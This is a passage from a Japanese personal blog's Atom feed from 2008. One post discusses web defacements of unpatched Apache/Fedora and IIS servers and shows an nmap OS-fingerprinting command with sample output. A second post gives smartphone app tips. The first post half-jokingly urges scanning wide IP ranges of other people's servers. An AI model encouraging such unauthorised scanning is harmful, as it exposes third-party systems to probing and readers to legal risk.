/&gt;日本のWEB改竄状況（※休止中のようです）&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;今回&lt;s&gt;大漁に&lt;/s&gt;ターゲットされたサーバは&lt;br /&gt;Apache/2.0.54 (Fedora)　と　Microsoft-IIS/5.0　及び　Microsoft-IIS/6.0&lt;br /&gt;となっています。&lt;br /&gt;IISの情報は多すぎるので、割愛するとして・・・。&lt;br /&gt;&lt;br /&gt;Apache/2.0.54 (Fedora) についてですが&lt;br /&gt;&lt;a href="http://www.securityfocus.com/bid/14106"&gt;SecurityFocus：&lt;span class="title"&gt;Apache HTTP Request Smuggling Vulnerability&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;これを利用した攻撃だとすると、報告日は2005年となっており、cross-site scripting がメインの&lt;br /&gt;ようです。ちょっと違うっぽいな。&lt;br /&gt;&lt;br /&gt;Fedora のみというのが気になるので 2005年当時の Fedora に存在する Security Hole を&lt;br /&gt;調べてみると&lt;br /&gt;&lt;span style="font-family:arial,helvetica;"&gt;&lt;span class="edgeatitle"&gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://neworder.box.sk/newsread.php?newsid=13007"&gt;Exploit Overflow Vulnerability Under Fedora Core&lt;/a&gt;&lt;br /&gt;というのに該当。これなのかなぁ？　しかしこれ　Fedora Core2　って書いてるぞ？？&lt;br /&gt;本当にこんなの稼働してるのか？&lt;br /&gt;&lt;br /&gt;いずれにしても、2008/02現在 Fedora 7/8が提供する最新 httpd は 2.2.8 ですから、Update&lt;br /&gt;してないサーバであることは確かのようです。探せば現状でも沢山動いてそうですね。&lt;br /&gt;&lt;br /&gt;どのくらいの稼働率なのか気になる方は、広大な IPレンジに nmap -O でもどうぞ。&lt;br /&gt;リストができたら私にも送って下さいｗ。　 &lt;span style="font-size:78%;"&gt;(注：他人のサーバにportscanすると侵入の試みとみなされる可能性が有ります)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:78%;"&gt;&lt;br /&gt;こんな感じで対象のOSバージョンを予測できます。&lt;br /&gt;# nmap -sS -O    ＜hoge.example.com＞&lt;hoge.example.com&gt;&lt;hogehoge.example.com&gt;&lt;br /&gt;PORT   STATE  SERVICE&lt;br /&gt;&lt;span style="color: rgb(255, 102, 102);"&gt;22/tcp open   ssh&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 102);"&gt;25/tcp closed smtp&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 102);"&gt;53/tcp open   domain&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 102);"&gt;80/tcp open   http&lt;/span&gt;&lt;br /&gt;Running: Linux 2.4.X|2.5.X, D-Link embedded&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;OS details: Linux 2.4.0 - 2.5.20, Linux 2.4.18 - 2.4.20, Linux 2.4.26, Linux 2.4.27 or D-Link DSL-500T (running linux 2.4)&lt;/span&gt;&lt;br /&gt;Nmap finished: 1 IP address (1 host up) scanned in 22.277 seconds&lt;/hogehoge.example.com&gt;&lt;/hoge.example.com&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:78%;"&gt;#ちなみに、これの正解はLinux hoge   &lt;span style="color: rgb(255, 0, 0);"&gt;2.4.21-50&lt;/span&gt;.ELsmp。&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;※セキュリティの情報&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/"&gt;http://www.st.ryukoku.ac.jp/~kjm/security/memo/&lt;/a&gt;&lt;br /&gt;セキュリティホール memo&lt;br /&gt;&lt;a href="http://www.st.ryukoku.ac.jp/%7Ekjm/security/antenna/"&gt;http://www.st.ryukoku.ac.jp/~kjm/security/antenna/&lt;/a&gt;&lt;br /&gt;セキュリティアンテナ&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;span style="font-weight: bold;"&gt;※クラックされたらこうなる？&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://10e.org/hackedpage/"&gt;http://10e.org/hackedpage/&lt;/a&gt;&lt;br /&gt;世界のハッキング画面のミラー&lt;br /&gt;&lt;a href="http://10e.org/hackedpage2/"&gt;http://10e.org/hackedpage2/&lt;/a&gt;&lt;br /&gt;世界のハッキング画面のミラー・第二弾&lt;br /&gt;&lt;br /&gt;&lt;a href="http://members.tripod.com/%7Eyupamojo/ppnbbs.html"&gt;http://members.tripod.com/~yupamojo/ppnbbs.html&lt;/a&gt;&lt;br /&gt;ポンポンネット（ppn.ne.jp）クラッキング顛末&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;center&gt;&lt;br /&gt;ハッキングツール・プログラム大全　　金床 (著) &lt;a href="http://www.amazon.co.jp/exec/obidos/ASIN/488718655X/ref=nosim/secblo-22/" target="_blank"&gt;&lt;br /&gt;&lt;img src="http://ec2.images-amazon.com/images/I/41C81VBME4L._AA90_.jpg" alt="ハッキングツール・プログラム大全　金床 (著) " border="0" height="90" width="90" /&gt;&lt;br /&gt;&lt;/a&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5550886365390077462-791107170069944112?l=root99.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://root99.blogspot.com/feeds/791107170069944112/comments/default' title='コメントの投稿'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5550886365390077462&amp;postID=791107170069944112' title='0 件のコメント'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5550886365390077462/posts/default/791107170069944112'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5550886365390077462/posts/default/791107170069944112'/><link rel='alternate' type='text/html' href='http://root99.blogspot.com/2008/02/web.html' title='Web改竄情報'/><author><name>john</name><uri>http://www.blogger.com/profile/03499652466972721958</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5550886365390077462.post-641416423814557907</id><published>2008-02-16T14:58:00.022+09:00</published><updated>2008-03-17T00:01:59.099+09:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='W-ZERO3 アドエス　ssh ssh2 公開鍵認証 teraterm PuTTTY'/><title type='text'>アドエス(WS011SH)で SSLVPN で SSH</title><content type='html'>&lt;span style="COLOR: rgb(0,0,0)"&gt;ウィルコム「&lt;/span&gt;&lt;a style="COLOR: rgb(0,0,0)" href="http://www.blogger.com/%20http://www.sharp.co.jp/ws/011sh/" target="blank"&gt;&lt;span style="color:#000000;"&gt;Advanced／W-ZERO3 [es]（型番：WS011SH）&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt;&lt;span style="COLOR: rgb(0,0,0)"&gt;」　を導入しました。&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="COLOR: rgb(0,0,0)"&gt;いわゆるアドエス。&lt;/span&gt;&lt;br /&gt;&lt;span class="price" style="COLOR: rgb(0,0,0)"&gt;通常の価格で買うと&lt;/span&gt;&lt;/span&gt;&lt;a style="COLOR: rgb(0,0,0)" href="http://www.amazon.co.jp/dp/B000VAB99U/ref=nosim/secblo-22/" target="blank"&gt;&lt;b class="price"&gt;&lt;span style="color:#000000;"&gt;5万円 &lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span class="price" style="COLOR: rgb(0,0,0)"&gt;&lt;span style="color:#000000;"&gt;もする端末なのですが、&lt;/span&gt;&lt;a href="https://store.willcom-inc.com/ec/faces/cmdprdw002445/" target="blank"&gt;&lt;span style="color:#000000;"&gt;2007年12月に年末までなら期間限定のキャンペーン中で無料購入できる&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt;というのにつられてしまった。&lt;br /&gt;&lt;span style="font-size:85%;"&gt;（Willcomは予定台数全部掃けるまでやるつもりなのか、2008年3月末までキャンペーン延長になった。）&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;span class="price"&gt; &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img id="BLOGGER_PHOTO_ID_5167570462783297634" style="FLOAT: right; MARGIN: 0pt 0pt 10px 10px; CURSOR: pointer" alt="" src="http://4.bp.blogspot.com/_8igRYQ31rD8/R7bl9Pn_2GI/AAAAAAAAAA8/wh8MHUNSkec/s200/WS011SH.jpg" border="0" /&gt;&lt;br /&gt;画像の通り、シルバーモデルにしました。&lt;br /&gt;なぜシルバーにしたかという理由は下記のとおり。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;私：　「どっちの色が人気ですかね？」&lt;br /&gt;&lt;br /&gt;店員：「黒の方が男性には売れてますね」&lt;br /&gt;&lt;br /&gt;脳内：　黒はオッサンに人気　⇒　女には黒売れてない　⇒　女にはシルバーが人気　ヽ(｀Д´#)ﾉ&lt;br /&gt;&lt;br /&gt;私：　「じゃ、シルバー下さい」&lt;br /&gt;&lt;br /&gt;店員：「HA…？　はい、かしこまりました！　（たまにいるんだよな…こういうの）」&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;　こう見えて、私も一昔前まで全てのスケジュールや連絡先をザウルスで管理するPDA大好き人間&lt;br /&gt;だったのですが、メモリーが飛んで&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;span style="font-size:78%;"&gt;&lt;span style="font-size:100%;"&gt;データが全て消失した時、バックアップの重要性とPDAの限界を（ry　　&lt;br /&gt;そんなわけで、しばらく遠ざかっていたわけですが、ここに来てまたもや火がつきそうな気配。&lt;br /&gt;Nifty につながるだけで喜んでたあの頃が懐かしいですね。&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;所見：&lt;br /&gt;　職場では主要メンバー　１２人中 ５人が W-ZERO3 を持つ状況です。&lt;br /&gt;　はっきり言ってミーハー過ぎ。&lt;br /&gt;　しかし、デスクトップのレイアウトと言うか、Today画面て言うんですが、全員カスタマイズされていて&lt;br /&gt;　見た目が全く違います。　自分用に使いやすくカスタマイズする楽しみもあるんですが、それだけ&lt;br /&gt;　Windows Mobile はデフォルトでは使いにくいOSだと言うこともできるでしょう。&lt;br /&gt;&lt;br /&gt;　もしあなたが、Windows ならそこそこ使いこなしてるよって人なら、かなりお勧めです。&lt;br /&gt;　&lt;span style="FONT-WEIGHT: bold;font-size:130%;" &gt;是非買うべき！&lt;/span&gt;&lt;br /&gt;　月々3000円弱で、&lt;/span&gt;&lt;a href="http://www.willcom-inc.com/ja/plan/phone/fixed_rate/index.html" target="blank"&gt;&lt;span style="color:#000000;"&gt;070相手なら話し放題&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt;になるのも大きいです。&lt;span style="font-size:78%;"&gt;（データ定額に入るなら＋1,050円）&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;●W-ZERO3の壁紙を変更する&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_8igRYQ31rD8/R7cPM_n_2II/AAAAAAAAABM/QH5MRtC-ZjY/s1600-h/kabegami.png"&gt;&lt;span style="color:#000000;"&gt;&lt;img id="BLOGGER_PHOTO_ID_5167615813342976130" style="FLOAT: left; MARGIN: 0pt 10px 10px 0pt; CURSOR: pointer" alt="" src="http://4.bp.blogspot.com/_8igRYQ31rD8/R7cPM_n_2II/AAAAAAAAABM/QH5MRtC-ZjY/s200/kabegami.png" border="0" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt;最初　[設定] ⇒ [Today] の下のほうにある [□この画像を背景に使用する→参照]&lt;br /&gt;で指定したのですが、画像が白っぽく表示されてしまうようです。&lt;br /&gt;&lt;br /&gt;[プログラム] ⇒ [画像とビデオ]&lt;br /&gt;の一覧の中からW-ZERO3内に保存されている画像を選択した状態で&lt;br /&gt;&lt;br /&gt;[メニュー] ⇒ [Todayの背景に設定する...]&lt;br /&gt;を選択すると、透過率を設定できます。左の画像では透過率35%くらい。&lt;br /&gt;←ちなみに川村ゆきえさんです。 &lt;/span&gt;&lt;br /&gt;&lt;span style="color:#000000;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;●エクスプローラーもカスタム&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_8igRYQ31rD8/R7cWEvn_2JI/AAAAAAAAABU/cYUWkMlfxBM/s1600-h/GSfinder.png"&gt;&lt;span style="color:#000000;"&gt;&lt;img id="BLOGGER_PHOTO_ID_5167623368190449810" style="FLOAT: left; MARGIN: 0pt 10px 10px 0pt; CURSOR: pointer" alt="" src="http://3.bp.blogspot.com/_8igRYQ31rD8/R7cWEvn_2JI/AAAAAAAAABU/cYUWkMlfxBM/s200/GSfinder.png" border="0" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href="http://www.zob.ne.jp/~goripon/wince/" target="blank"&gt;&lt;span style="color:#000000;"&gt;GSFinder-W03&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt;&lt;br /&gt;&lt;br /&gt;上記サイトから [実行ファイル単体CAB] をゲット。&lt;br /&gt;ハイレゾモードがあるのでファイルの一覧も楽チンになって、コピペだって&lt;br /&gt;削除だって編集だってアメンボだぁーって、みんなみんな便利になるんです。&lt;br /&gt;&lt;br /&gt;ただ、起動のたびにルートディレクトリを参照してしまうのが・・・。&lt;br /&gt;　と、思ったら 設定変更で[ツール] の[オプション] から [前回終了したときのフォルダを記憶]　にチェックつけてなかった。便利。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;●ファイルを圧縮・解凍する&lt;br /&gt;&lt;br /&gt;&lt;img id="BLOGGER_PHOTO_ID_5167643069205436610" style="FLOAT: left; MARGIN: 0pt 10px 10px 0pt; CURSOR: pointer" alt="" src="http://2.bp.blogspot.com/_8igRYQ31rD8/R7cn_fn_2MI/AAAAAAAAABs/qUpp7b7NBCU/s200/pocketRAR.png" border="0" /&gt;デフォルトで ZIPファイルは扱えるようです。&lt;br /&gt;&lt;br /&gt;けどいまいち使いにくいので WinRAR の PDA版 PocketRAR を入れました。&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://www.rarlab.com/download.htm" target="blank"&gt;&lt;span style="color:#000000;"&gt;&lt;img id="BLOGGER_PHOTO_ID_5167642180147206322" style="FLOAT: left; MARGIN: 0pt 10px 10px 0pt; CURSOR: pointer" alt="" src="http://3.bp.blogspot.com/_8igRYQ31rD8/R7cnLvn_2LI/AAAAAAAAABk/0NR6OxV2kKQ/s200/programmenu.png" border="0" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href="http://www.rarlab.com/download.htm" target="blank"&gt;&lt;span style="color:#000000;"&gt;RAR 3.71 for Pocket PC&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt;&lt;br /&gt;からダウンロードしてCABをクリック。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;●W-ZERO3でSSH&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_8igRYQ31rD8/R7c06vn_2OI/AAAAAAAAAB8/7QJYFWDMguA/s1600-h/pocketPutty.png"&gt;&lt;span style="color:#000000;"&gt;&lt;img id="BLOGGER_PHOTO_ID_5167657281252219106" style="FLOAT: left; MARGIN: 0pt 10px 10px 0pt; CURSOR: pointer" alt="" src="http://3.bp.blogspot.com/_8igRYQ31rD8/R7c06vn_2OI/AAAAAAAAAB8/7QJYFWDMguA/s200/pocketPutty.png" border="0" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt;PocketPuTTY&lt;br /&gt;&lt;br /&gt;W-ZERO3購入の動機となったのは、これで SSH が使えることを知ったから。　しかも &lt;/span&gt;&lt;a href="http://www.f5networks.co.jp/" target="blank"&gt;&lt;span style="color:#000000;"&gt;F5 の SSLVPN&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt; は、W&lt;span style="font-size:78%;"&gt;indows&lt;/span&gt;M&lt;span style="font-size:78%;"&gt;obile&lt;/span&gt;にも対応しているので職場のピンチにもマクドナルドで迅速に対応可能さ！&lt;span style="font-size:78%;"&gt;（内緒）&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://www2h.biglobe.ne.jp/~m-saeki/junk/PocketPuTTY.html"&gt;http://www2h.biglobe.ne.jp/~m-saeki/junk/PocketPuTTY.html&lt;/a&gt;&lt;br /&gt;PocketPuTTY 日本語対応版&lt;br /&gt;&lt;a href="http://www2h.biglobe.ne.jp/~m-saeki/junk/PocketPuTTY.wm6.2007-11-22.zip"&gt;Windows Mobile 6 Classic/Professional&lt;/a&gt; 　　※推奨（アドエスで動作確認済み）&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.tokuda.net/cgi-bin/fswiki/wiki.cgi?page=PocketPuTTY"&gt;&lt;span style="color:#000000;"&gt;http://www.tokuda.net/cgi-bin/fswiki/wiki.cgi?page=PocketPuTTY&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt;&lt;br /&gt;PocketPuTTY for W-ZERO3　&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://www.pocketputty.net/"&gt;&lt;span style="color:#000000;"&gt;http://www.pocketputty.net/&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt;&lt;br /&gt;本家(英語) &lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;●ブラウザーをカスタム&lt;br /&gt;&lt;br /&gt;NetFront&lt;br /&gt;&lt;br /&gt;まるで PDF のようなスムーズな操作感。&lt;br /&gt;これに比べたら重たい IE の代替でプリインストールされている Opera の存在理由が無くなってしまう。&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://www.jp.access-company.com/products/downloads/index.html"&gt;&lt;span style="color:#000000;"&gt;NetFront Browser v3.5 for Windows Mobile コンセプ&lt;/span&gt;&lt;/a&gt;&lt;a href="http://www.jp.access-company.com/products/downloads/index.html"&gt;&lt;span style="color:#000000;"&gt;ト版&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt;&lt;br /&gt;現在はコンセプト版なので、永久に使えるかわかりませんが、あとアレとアレが対応された製品版が出たらレジストしてしまいそう。&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;●Yahooメッセンジャー&lt;br /&gt;&lt;br /&gt;Windowsメッセンジャーは元からプリインストールされています。&lt;br /&gt;でも普段使ってるのは Yahooメッセの方なので、ずっとあったらいいなーと思ってました。&lt;br /&gt;ただ、友達登録が２０人を超えていると一覧を表示しなくなるバグがあります。&lt;br /&gt;おかげで滅多にやりとりしない友人を泣く泣く削除することに…。&lt;br /&gt;&lt;/span&gt;&lt;a href="http://crsh.client.jp/"&gt;&lt;span style="color:#000000;"&gt;http://crsh.client.jp/&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;●USB充電ケーブル&lt;br /&gt;&lt;br /&gt;USB接続ケーブル兼充電用ケーブルてのがあるそうです。&lt;br /&gt;実は付属のUSB接続ケーブルでPCと接続しているだけでバッテリー充電もしているようなので&lt;br /&gt;不要なのかも知れません。&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;span style="font-size:78%;"&gt;※USB充電の方が時間がかかるっぽい。&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;●動画を見る&lt;br /&gt;&lt;br /&gt;プリインストールされている Windows Media Player では重たくてカクカク。&lt;br /&gt;しかもWMV ファイルのみで Mpeg4 も見れないぞ！&lt;br /&gt;ってことで、TCPMP がこれらを全て解決してくれます。&lt;br /&gt;&lt;br /&gt;Windows Mobile 用 &lt;/span&gt;&lt;a href="http://shintak.info/ppc/download/TCPMP/WindowsMobile/tcpmp.pocketpc.0.72RC1.pack.cab"&gt;&lt;span style="color:#000000;"&gt;tcpmp.pocketpc.0.72RC1.pack.cab&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt; &lt;span style="COLOR: rgb(0,0,0)"&gt;(3.1 MB)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Windows Mobile 6用 WMV 再生用 mod Codec Pack &lt;/span&gt;&lt;a href="http://shintak.info/ppc/download/TCPMP/WindowsMobile/wmpmod.cab"&gt;&lt;span style="COLOR: rgb(0,0,255)"&gt;wmpmod.cab&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt; &lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;span style="COLOR: rgb(0,0,0)"&gt;(1.0 MB)&lt;br /&gt;&lt;br /&gt;詳しくはここ&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="COLOR: rgb(0,0,0)"&gt;&lt;a href="http://blogs.shintak.info/articles/TCPMP.aspx"&gt;&lt;span style="color:#000000;"&gt;http://blogs.shintak.info/articles/TCPMP.aspx&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;●画面のキャプチャー&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_8igRYQ31rD8/R7dBF_n_2QI/AAAAAAAAACM/oxJSXJuCc-Y/s1600-h/ScreenCapture.png"&gt;&lt;span style="color:#000000;"&gt;&lt;img id="BLOGGER_PHOTO_ID_5167670668665280770" style="FLOAT: left; MARGIN: 0pt 10px 10px 0pt; CURSOR: pointer" alt="" src="http://4.bp.blogspot.com/_8igRYQ31rD8/R7dBF_n_2QI/AAAAAAAAACM/oxJSXJuCc-Y/s200/ScreenCapture.png" border="0" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt;このブログで使用した画像は　 [Fn]＋[文字] 　で画面キャプチャーした画像です。&lt;br /&gt;&lt;br /&gt;Fn キーを押したままで、文字キーを押すと…、いや文字キーは両方にあるけど、&lt;br /&gt;表側の方の…何て言うの？&lt;br /&gt;&lt;br /&gt;その文字キーを押すとピロンピロン♪て言いますから、そしたらエクスプローラーで&lt;br /&gt;一番上のディレクトリを見て下さい。&lt;br /&gt;SCRN0001.BMP というのが出来ていますから、圧縮するなりメールするなりUSBで&lt;br /&gt;右から左へ受け流すなりして下さい。&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#000000;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#000000;"&gt;●ソフトキー&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_8igRYQ31rD8/R7dEb_n_2RI/AAAAAAAAACU/zFYzpZpcavA/s1600-h/key.png"&gt;&lt;span style="color:#000000;"&gt;&lt;img id="BLOGGER_PHOTO_ID_5167674345157286162" style="FLOAT: left; MARGIN: 0pt 10px 10px 0pt; CURSOR: pointer" alt="" src="http://4.bp.blogspot.com/_8igRYQ31rD8/R7dEb_n_2RI/AAAAAAAAACU/zFYzpZpcavA/s200/key.png" border="0" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="color:#000000;"&gt;いちいち画面をタップ（スタイラスっていうとんがったので画面押すこと）&lt;br /&gt;するのは面倒なことも多いです。&lt;br /&gt;&lt;br /&gt;[スタートメニュー] ⇒ [設定] ⇒ [個人用] ⇒ [ソフトキー] の画面で&lt;br /&gt;[□　ソフトキー動作を使用する] にチェックを入れると、&lt;br /&gt;ボタンの上にある機能を　[ 田 ]　と　[ OK ] キーで使えるようになります。&lt;br /&gt;ちょんっと押すと、ソフトキー。　１秒以上押し続けると、元々のキーの動作となります。 &lt;/span&gt;&lt;br /&gt;&lt;span style="color:#000000;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br 